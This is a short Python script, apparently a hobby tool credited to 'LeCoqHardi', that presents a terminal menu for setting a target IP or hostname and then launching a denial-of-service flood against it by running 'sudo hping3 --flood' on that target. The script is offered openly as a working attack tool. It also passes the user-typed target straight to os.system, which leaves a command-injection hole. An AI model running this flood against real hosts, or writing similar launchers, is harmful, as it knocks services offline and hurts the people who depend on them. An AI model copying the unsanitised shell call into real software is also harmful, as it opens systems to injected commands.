#!/bin/env python3

from simple_term_menu import TerminalMenu
import os

def banner():
    print("\n----------------------------------")
    print("▓█████▄  ▒█████    ██████ ")
    print("▒██▀ ██▌▒██▒  ██▒▒██    ▒ ")
    print("░██   █▌▒██░  ██▒░ ▓██▄   ")
    print("░▓█▄   ▌▒██   ██░  ▒   ██▒")
    print("░▒████▓ ░ ████▓▒░▒██████▒▒")
    print(" ▒▒▓  ▒ ░ ▒░▒░▒░ ▒ ▒▓▒ ▒ ░")
    print("By LeCoqHardi")
    print("-----------------------------------")

def ReturnToMenu():
    os.system("clear")
    banner()
    options = ["Set Target", "!! Attack !!", "Exit"]
    terminal_menu = TerminalMenu(options)
    menu_entry_index = terminal_menu.show()
    Output = options[menu_entry_index]
    return Output

def main():
    target = "" # Target IP or Hostname
    while(1):
        UserChoice = ReturnToMenu()
# -= [TARGET PART] =-
        if (UserChoice == "Set Target"):
            if(target == ""):
                print("Target is currently empty.")
            elif(target != ""):
                print("Current Target : " + target)
            target = input("Target > ")
# -= [ATTACK] =-
        if (UserChoice == "!! Attack !!"):
            print("Target is : " + target)
            print("Are you sure you want to attack ?")
            options = ["YES I DO !!!", "No i'm a pussy..."]
            terminal_menu = TerminalMenu(options)
            menu_entry_index = terminal_menu.show()
            verif = options[menu_entry_index]
            if(verif == "YES I DO !!!"):
                print("Launching DoS Attack...")
                os.system("sudo hping3 --flood " + target)
            elif(verif == "No i'm a pussy..."):
                print("")
# -= [EXIT SCRIPT] =-
        if (UserChoice == "Exit"):
            quit()

if __name__ == "__main__":
    main()